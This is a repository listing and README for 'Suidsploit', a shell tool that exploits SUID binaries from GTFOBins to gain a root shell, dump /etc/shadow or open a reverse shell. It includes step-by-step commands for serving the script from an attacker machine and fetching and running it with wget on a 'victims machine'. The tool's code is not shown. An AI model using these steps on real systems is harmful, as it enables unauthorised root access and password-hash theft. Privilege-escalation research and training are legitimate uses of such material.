https://github.com/s1lkys/suidsploit
A Tool which can exploit 137 files from GTFO-Bins automaticlly
https://github.com/s1lkys/suidsploit
gtfobins privilege-escalation suidsploit
Last synced: 4 months ago
JSON representation
A Tool which can exploit 137 files from GTFO-Bins automaticlly
- Host: GitHub
- URL: https://github.com/s1lkys/suidsploit
- Owner: S1lkys
- Created: 2019-04-03T21:14:46.000Z (about 7 years ago)
- Default Branch: master
- Last Pushed: 2019-10-10T19:36:16.000Z (over 6 years ago)
- Last Synced: 2025-07-07T02:47:00.528Z (12 months ago)
- Topics: gtfobins, privilege-escalation, suidsploit
- Language: Shell
- Homepage:
- Size: 233 KB
- Stars: 12
- Watchers: 1
- Forks: 4
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Suidsploit by Tizun & Silky
[](https://travis-ci.org/joemccann/dillinger)
Suidsploit is a Tool which can exploit 137 files from GTFO-Bins where the Suidbit is set.
On successful exploitation you can gain:
- Root Shell
- Output of /etc/shadow
- Reverse shell

# Usage:
Open your favorite Terminal and run these commands.
On your machine:
- Download Suidsploit
- Start a HTTP-Server
$ git clone https://github.com/S1lkys/Suidsploit.git
$ cd Suidsploit/
$ python -m SimpleHTTPServer 80
On victims machine:
- download Suidsploit
- make it executable
- execute Suidsploit
$ wget http://192.168.xxx.xxx/Suidsploit.sh
$ chmod +x Suidsploit.sh
$ bash Suidsploit.sh
### Todos
- Fix found Bugs
- Add new Tools
License
----
For educational Purpose only!
---